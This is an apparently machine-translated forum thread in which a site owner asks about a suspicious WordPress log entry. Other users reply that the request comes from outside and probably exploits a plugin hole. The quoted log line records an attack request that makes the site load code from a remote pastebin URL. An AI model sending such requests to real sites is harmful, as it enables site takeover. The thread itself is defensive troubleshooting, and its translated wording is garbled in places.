In the logs of the site is the site with malicious activity, what to do?

[22/Mar/2019:06:47:35 +0300] 0.000 0.000 301 109.228.43.17 Laila_Oberbrunner85.ru GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/Th1EKR8i HTTP/1.1 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/ 20100101 Firefox/64.0" "-" 755 141.8.194.54 Laila_Oberbrunner85

Antivirus prova responds to https://pastebin.com, as it believes that the site is harmful.
1. Where the request is formed from the outside or from the inside?
2. 1 If inside, how to understand what forms it
2.2. If outside, what additional measures should be taken?
March 19th 20 at 08:26
2 answers
March 19th 20 at 08:28
Outside. What kind of "antivirus" is unclear, but pastebin is not a malicious site. It is necessary to throw your "anti-virus".
pastebin - no, but the code is there loaded - it may very well be. - lindsey.Schmidt commented on March 19th 20 at 08:31
@lindsey.Schmidt, and that if there is code? If only wp does not eval() - it will be all right. - Josiah_Turcotte commented on March 19th 20 at 08:34
March 19th 20 at 08:30
Alex, same problem. This link podruzhatsya malicious code and change the site_url in the WB Wordpress on some random website. I can not yet understand the mechanism of this.
- someone put this on pastebin malware, so as not to burn down your server.
- your WordPress and for some reason it loads and executes. here 2 variants - or is this done with a computer where the user is logged in as the administrator, and therefore has rights (it is necessary to understand how he could 141.8.194.54 if your not, or why this is happening, if yours), or you have a hole in WordPress.
in any case, do not want to Google that and make swp_debug swp_url - lindsey.Schmidt commented on March 19th 20 at 08:33

Find more questions by tags Web DevelopmentLoggingvirusesCMS